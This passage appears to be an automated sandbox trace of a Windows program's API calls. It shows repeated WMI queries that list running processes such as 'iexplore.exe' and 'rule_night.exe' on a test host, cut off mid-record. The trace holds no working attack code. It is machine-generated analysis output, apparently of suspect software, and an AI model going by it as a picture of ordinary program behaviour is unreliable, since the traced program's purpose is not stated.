pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x27bee7c*=8, plFlavor=0x27bee80*=0) returned 0x0 [0279.084] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.084] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.084] IWbemClassObject:Get (in: This=0x595600, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bee7c*=8, plFlavor=0x27bee80*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x27bee7c*=8, plFlavor=0x27bee80*=0) returned 0x0 [0279.084] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.084] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0279.085] CoTaskMemAlloc (cb=0x4) returned 0x56ea170 [0279.085] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea170, puReturned=0x27bb39c | out: apObjects=0x56ea170*=0x595798, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.110] IUnknown:QueryInterface (in: This=0x595798, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595798) returned 0x0 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.111] IUnknown:AddRef (This=0x595798) returned 0x3 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x59579c) returned 0x0 [0279.111] IMarshal:GetUnmarshalClass (in: This=0x59579c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.111] IUnknown:Release (This=0x59579c) returned 0x3 [0279.111] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.111] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.111] IUnknown:QueryInterface (in: This=0x595798, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.112] IUnknown:Release (This=0x595798) returned 0x2 [0279.112] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.112] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.112] IUnknown:QueryInterface (in: This=0x595798, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595798) returned 0x0 [0279.112] IUnknown:AddRef (This=0x595798) returned 0x4 [0279.112] IUnknown:Release (This=0x595798) returned 0x3 [0279.112] IUnknown:Release (This=0x595798) returned 0x2 [0279.112] CoTaskMemFree (pv=0x56ea170) [0279.112] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.112] IUnknown:AddRef (This=0x595798) returned 0x3 [0279.112] IWbemClassObject:Get (in: This=0x595798, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.112] IWbemClassObject:Get (in: This=0x595798, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.112] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x66 [0279.113] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x66 [0279.113] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.113] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.113] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.113] IUnknown:Release (This=0x500344) returned 0x1 [0279.113] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea170) returned 0x0 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea170, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.114] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea170, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a96b8) returned 0x0 [0279.114] WbemDefPath:IUnknown:Release (This=0x56ea170) returned 0x0 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a96b8) returned 0x0 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.114] WbemDefPath:IUnknown:AddRef (This=0x5a96b8) returned 0x3 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea180) returned 0x0 [0279.114] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea180, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.115] WbemDefPath:IUnknown:Release (This=0x56ea180) returned 0x3 [0279.115] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.115] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.115] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.115] WbemDefPath:IUnknown:Release (This=0x5a96b8) returned 0x2 [0279.115] WbemDefPath:IUnknown:Release (This=0x5a96b8) returned 0x1 [0279.115] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.115] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.115] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a96b8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a96b8) returned 0x0 [0279.115] WbemDefPath:IUnknown:AddRef (This=0x5a96b8) returned 0x3 [0279.115] WbemDefPath:IUnknown:Release (This=0x5a96b8) returned 0x2 [0279.115] WbemDefPath:IWbemPath:SetText (This=0x5a96b8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2300\"") returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.115] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.115] IWbemClassObject:Get (in: This=0x595798, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bf6f0*=0, plFlavor=0x27bf6f4*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rule_night.exe", varVal2=0x0), pType=0x27bf6f0*=8, plFlavor=0x27bf6f4*=0) returned 0x0 [0279.115] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0279.115] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0279.115] IWbemClassObject:Get (in: This=0x595798, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bf6f0*=8, plFlavor=0x27bf6f4*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="rule_night.exe", varVal2=0x0), pType=0x27bf6f0*=8, plFlavor=0x27bf6f4*=0) returned 0x0 [0279.116] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0279.116] SysStringByteLen (bstr="rule_night.exe") returned 0x1c [0279.116] CoTaskMemAlloc (cb=0x4) returned 0x56ea1b0 [0279.116] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56ea1b0, puReturned=0x27bb39c | out: apObjects=0x56ea1b0*=0x595930, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.143] IUnknown:QueryInterface (in: This=0x595930, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x595930) returned 0x0 [0279.143] IUnknown:QueryInterface (in: This=0x595930, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.143] IUnknown:QueryInterface (in: This=0x595930, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.143] IUnknown:AddRef (This=0x595930) returned 0x3 [0279.143] IUnknown:QueryInterface (in: This=0x595930, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.143] IUnknown:QueryInterface (in: This=0x595930, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.144] IUnknown:QueryInterface (in: This=0x595930, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x595934) returned 0x0 [0279.144] IMarshal:GetUnmarshalClass (in: This=0x595934, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.144] IUnknown:Release (This=0x595934) returned 0x3 [0279.144] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.144] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.144] IUnknown:QueryInterface (in: This=0x595930, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.144] IUnknown:Release (This=0x595930) returned 0x2 [0279.144] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.144] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.144] IUnknown:QueryInterface (in: This=0x595930, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x595930) returned 0x0 [0279.144] IUnknown:AddRef (This=0x595930) returned 0x4 [0279.144] IUnknown:Release (This=0x595930) returned 0x3 [0279.144] IUnknown:Release (This=0x595930) returned 0x2 [0279.144] CoTaskMemFree (pv=0x56ea1b0) [0279.144] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.144] IUnknown:AddRef (This=0x595930) returned 0x3 [0279.144] IWbemClassObject:Get (in: This=0x595930, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.145] IWbemClassObject:Get (in: This=0x595930, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.145] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x66 [0279.145] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x66 [0279.145] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.145] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.145] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.145] IUnknown:Release (This=0x500344) returned 0x1 [0279.146] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56ea1b0) returned 0x0 [0279.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x56ea1b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.146] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56ea1b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9798) returned 0x0 [0279.146] WbemDefPath:IUnknown:Release (This=0x56ea1b0) returned 0x0 [0279.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9798) returned 0x0 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.147] WbemDefPath:IUnknown:AddRef (This=0x5a9798) returned 0x3 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56ea1c0) returned 0x0 [0279.147] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56ea1c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.147] WbemDefPath:IUnknown:Release (This=0x56ea1c0) returned 0x3 [0279.147] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.147] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.147] WbemDefPath:IUnknown:Release (This=0x5a9798) returned 0x2 [0279.147] WbemDefPath:IUnknown:Release (This=0x5a9798) returned 0x1 [0279.147] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.147] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9798, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9798) returned 0x0 [0279.147] WbemDefPath:IUnknown:AddRef (This=0x5a9798) returned 0x3 [0279.147] WbemDefPath:IUnknown:Release (This=0x5a9798) returned 0x2 [0279.147] WbemDefPath:IWbemPath:SetText (This=0x5a9798, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2308\"") returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.148] WbemDefPath:IWbemPath:GetText (in: 